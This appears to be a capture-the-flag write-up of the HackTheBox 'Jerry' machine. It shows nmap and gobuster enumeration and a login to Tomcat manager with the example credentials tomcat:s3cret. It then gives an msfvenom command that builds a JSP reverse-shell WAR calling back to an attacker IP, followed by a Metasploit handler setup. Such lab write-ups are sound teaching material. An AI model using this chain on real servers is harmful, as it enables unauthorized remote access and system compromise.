HackTheBox Jerry Writeup
Enjoy reading my HTB Jerry Writeup
Information Gathering
Let's start with a nmap scan to gain some knowledge about the running services on the HTB Jerry machine.
sudo nmap -p- -T4 -sC -sV -O -v 10.10.10.95
The running operating system seems to be a Windows Server 2012 with apache tomcat/coyote running on port 8080.
Browsing the site we see the default page of Apache Tomcat/7.0.88. Let's keep that version in mind as we might have to search for matching exploits but first I will enumerate for directories and files.
gobuster dir -u http://10.10.10.95:8080/ -x php -w /Lists/directory-small.txt
Gobuster found three directories:
- /docs
- /examples
- /manager
But they all seem to be part of the default page and the /manager directory needs valid login credentials we do not have.
By clicking on "cancel" we get redirected to the 401 Unauthorized page that tells us how to set up a user and the default/example credentials: tomcat:s3cret.
Once again, the web admin was pretty lazy as these credentials are actually working.
Gaining a reverse shell
After logging into the manager panel we can deploy a WAR file. Luckily, msfvenom can create payloads in the WAR format using the following command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f war > shell.war
which we then can upload using the deploy function on the website.
Next, fire up metasploit and select the handler: using exploit/multi/handler
, then adjust the LHOST, LPORT, and the payload used.
After this is all set up, browse the website: http://10.10.10.95:8080/shell/
and we will get a reverse shell session in msf.
As we already have nt authority/system permissions we navigate straight to C:\Users\Administrator\Desktop\flags
without further privilege escalation.
Use type "2 for the price of 1.txt"
to display both, the user and the root flag.
Tags:
HTB, hackthebox, jerry, windows, apache, tomcat